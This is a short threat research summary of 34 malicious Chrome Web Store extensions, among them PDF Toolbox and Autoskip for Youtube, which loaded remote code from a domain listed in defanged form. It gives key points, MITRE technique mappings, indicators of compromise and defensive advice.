Threat Research

Malicious extensions in the Chrome Web Store

Securonix

Independent cybersecurity researchers uncovered a cluster of malicious Chrome extensions in the Chrome Web Store, with a total of about 87 million downloads. The extensions could load remote code, modify search results, and potentially exfiltrate data from users’ browsers. #AutoskipForYoutube #PDFToolbox #VladimirPalant #BriskVPN #EpsilonAdblock #AdblockDragon

Keypoints

  • The investigation began with the PDF Toolbox extension, which contained suspicious code and loaded from a remote domain serasearchtop[.]com.
  • Palant identified a couple dozen extensions with similar “additional functionality” and a combined 55 million downloads.
  • Armed with samples, researchers found 34 malicious extensions in total, with the whole set downloaded about 87 million times; Autoskip for Youtube topped at 9 million downloads.
  • The extensions were uploaded to the Chrome Web Store in 2021 and 2022 and remained for months before being removed.
  • User reviews sometimes noted adware-like replacements in search results, yet moderators largely failed to act promptly.
  • Defensive guidance emphasizes limiting extensions, checking reviews, auditing installed extensions, and using device protection.

MITRE Techniques

  • [T1189] Drive-by Compromise – The extension loaded arbitrary code from a remote server to run in the browser. “the plugin accessed a serasearchtop[.]com site, from where it loaded arbitrary code on all pages viewed by the user.”
  • [T1059.007] JavaScript – The malicious behavior originates from browser-based scripting and execution of loaded code.
  • [T1555.003] Credentials in Web Browsers – The extension could steal card details and account credentials. “Steal card details and account credentials.”

Indicators of Compromise

  • [Domain] serasearchtop[.]com – used to host or deliver malicious code to users.
  • [File] Autoskip for Youtube – one of the malicious extensions with high download counts.
  • [File] PDF Toolbox – initial extension found to contain suspicious code.

Read more: https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint